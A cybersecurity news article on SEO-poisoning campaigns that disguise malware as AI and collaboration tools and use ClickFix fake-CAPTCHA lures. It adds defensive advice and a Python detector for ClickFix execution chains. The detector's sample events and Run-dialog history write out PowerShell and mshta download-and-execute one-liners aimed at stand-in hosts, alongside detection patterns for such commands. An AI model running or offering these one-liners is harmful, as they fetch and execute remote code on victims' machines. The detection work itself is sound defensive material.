SEO Poisoning Campaign Delivers Malware Disguised as AI Tools

Cybercriminals are orchestrating sophisticated SEO poisoning campaigns to target small- and medium-sized businesses (SMBs), exploiting their growing reliance on AI and collaboration tools.
Recent research by Kaspersky and Varonis documents a surge in malvertising campaigns in which attackers buy search-engine ad placements to promote what look like legitimate software downloads. The sponsored results impersonate trusted names such as ChatGPT, Zoom, Google Drive, Microsoft Teams, and Salesforce. Victims are redirected to pages that mimic official tech-support portals of companies such as Apple, HP, Microsoft, PayPal, and Netflix.
The attack flow often includes a fake Cloudflare CAPTCHA page that uses the ClickFix technique: the page silently copies a command to the victim's clipboard and instructs them to "verify" by pressing Win+R, pasting, and pressing Enter, so the victim launches the first stage themselves rather than opening a downloaded file. In the documented campaigns this stage deploys loaders such as Hijack Loader, which in turn drops RedLine Stealer. RedLine harvests saved credentials, clipboard contents, and cryptocurrency wallet keys, and can silently install further payloads.
One campaign involved a falsified update for the Pi Network desktop app for Windows, designed to exfiltrate sensitive user data while bypassing antivirus detection. IT administrators are a primary target due to their elevated privileges and role in managing infrastructure.
Separately, Varonis disclosed a critical vulnerability in AZNFS-mount, a utility preinstalled on Azure HPC and AI images, adding to the exposure of organizations that run these workloads.
In one documented intrusion, threat actors extracted nearly a terabyte of data from the compromised environment before encrypting VMware ESXi systems and issuing a ransom demand. The attackers also deployed surveillance software based on the commercial employee-monitoring tool Kickidler, disguised under the file name grabber.exe, to watch victim activity and capture credentials.
This campaign underscores an evolution in criminal tradecraft: SEO manipulation to reach victims, social engineering (ClickFix) to get code running, and technical exploitation to expand access. The operations rely on the trust users place in search results and on the growing use of AI tools in business settings.
How to Defend Against SEO Poisoning
- Download tools only from the vendor's own site, reached by typing the address or using a bookmark, and never from sponsored results, which are ads and are placed above the organic results. Check the installer's code signature before running it.
- Train IT personnel and end users to recognize SEO poisoning and ClickFix lures: no legitimate CAPTCHA or "fix" page asks you to paste a command into the Run dialog, a terminal, or PowerShell.
- Use EDR/XDR with behavioral detection and sandboxing, and alert on explorer.exe or a browser spawning powershell.exe, mshta.exe, or cmd.exe with download-and-execute command lines.
- Regularly audit cloud images for preinstalled but vulnerable tools (such as AZNFS-mount on Azure HPC and AI images) and patch them.
- Segment the network, keep hypervisor management interfaces such as ESXi off the user LAN, maintain offline backups, and rehearse incident response so that data theft and encryption can be contained quickly.
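The ClickFix stage described in the attack flow above, and the EDR/XDR recommendation, both come down to one observable: a user-facing process (the Run dialog lives in explorer.exe, or the browser) spawning an interpreter with a download-and-execute one-liner. The following detector is an added example written for this page, not code from the article, Kaspersky, or Varonis. It assumes Sysmon Event ID 1 field names (ParentImage, Image, CommandLine); the sample events, the RunMRU values, and the example.invalid URLs are constructed for the demonstration. The registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is real and stores the Run-dialog history, which is where a pasted ClickFix command leaves a trace even when process telemetry is missing.

```python
"""Detect ClickFix-style execution chains in process-creation telemetry.

Added example (not code from the original article or from Kaspersky/Varonis).
Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the
events and RunMRU values below are constructed for the demo, not captured.
"""
import ntpath
import re

# Processes a ClickFix page gets the victim to launch from (Win+R / browser).
USER_LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Interpreters and LOLBins the pasted one-liner typically invokes.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "certutil.exe", "curl.exe",
}
# Command-line fragments characteristic of download-and-execute one-liners.
INDICATORS = re.compile(
    r"(?i)("
    r"\biex\b|invoke-expression|\birm\b|invoke-restmethod|\biwr\b|invoke-webrequest"
    r"|downloadstring|frombase64string"
    r"|(?<!\w)-e(nc|ncodedcommand)?(?!\w)"  # -e / -enc / -EncodedCommand
    r"|-w(indowstyle)?\s+(hidden|1)\b"      # -w hidden / -w 1
    r"|mshta(\.exe)?\s+\S*https?://"        # mshta <url>
    r"|certutil(\.exe)?\s+.*-urlcache"      # certutil -urlcache ... <url>
    r")"
)


def basename(path):
    # ntpath handles Windows paths even when this runs on Linux.
    return ntpath.basename(path).lower()


def classify_event(event):
    """Return a reason string if the event looks like ClickFix, else None.

    All three conditions must hold: a user-facing parent, an interpreter or
    LOLBin child, and a download-and-execute indicator in the command line.
    """
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if parent not in USER_LAUNCHERS or child not in SUSPICIOUS_CHILDREN:
        return None
    m = INDICATORS.search(cmdline)
    if not m:
        return None
    return f"{parent} -> {child} with indicator '{m.group(0)}'"


def scan_events(events):
    """Return [(index, reason)] for every event that matches."""
    hits = []
    for i, ev in enumerate(events):
        reason = classify_event(ev)
        if reason:
            hits.append((i, reason))
    return hits


def scan_runmru(entries):
    """Flag Run-dialog history values (HKCU\\...\\Explorer\\RunMRU).

    Each value is stored as '<command>\\1'; the trailing '\\1' is stripped
    before matching. Returns the suspicious commands.
    """
    flagged = []
    for raw in entries:
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        if INDICATORS.search(cmd):
            flagged.append(cmd)
    return flagged


# Constructed sample telemetry (URLs use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    {   # pasted fake-CAPTCHA one-liner: should fire
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iex (irm https://verify.example.invalid/check)"',
    },
    {   # mshta pulling a remote HTA: should fire
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://cdn.example.invalid/captcha.hta",
    },
    {   # developer running a build script from an IDE: benign (parent not a launcher)
        "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -NoProfile -ExecutionPolicy Bypass -File build.ps1",
    },
    {   # user opening an interactive shell from the Start menu: benign (no indicator)
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell",
    },
]

SAMPLE_RUNMRU = [
    "notepad\\1",
    'powershell -w 1 -c "iex (iwr https://verify.example.invalid/fix)"\\1',
    "\\\\fileserver\\share\\1",
]

if __name__ == "__main__":
    for idx, why in scan_events(SAMPLE_EVENTS):
        print(f"ALERT event[{idx}]: {why}")
    for cmd in scan_runmru(SAMPLE_RUNMRU):
        print(f"ALERT RunMRU: {cmd}")
```

The three-part condition (launcher parent, interpreter child, download indicator) is what keeps the false-positive rate usable: an administrator opening PowerShell from the Start menu, or an IDE running a build script, does not fire. On a real host the RunMRU values can be read with `Get-ItemProperty` in PowerShell and fed to `scan_runmru`; the indicator list is a starting point and should be extended with whatever your own ClickFix samples use.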
Given the scale and precision of these campaigns, it is imperative for organizations to harden their environments, vet download sources, and stay informed of emerging cybercrime techniques.
Sources: The Hacker News | HackRead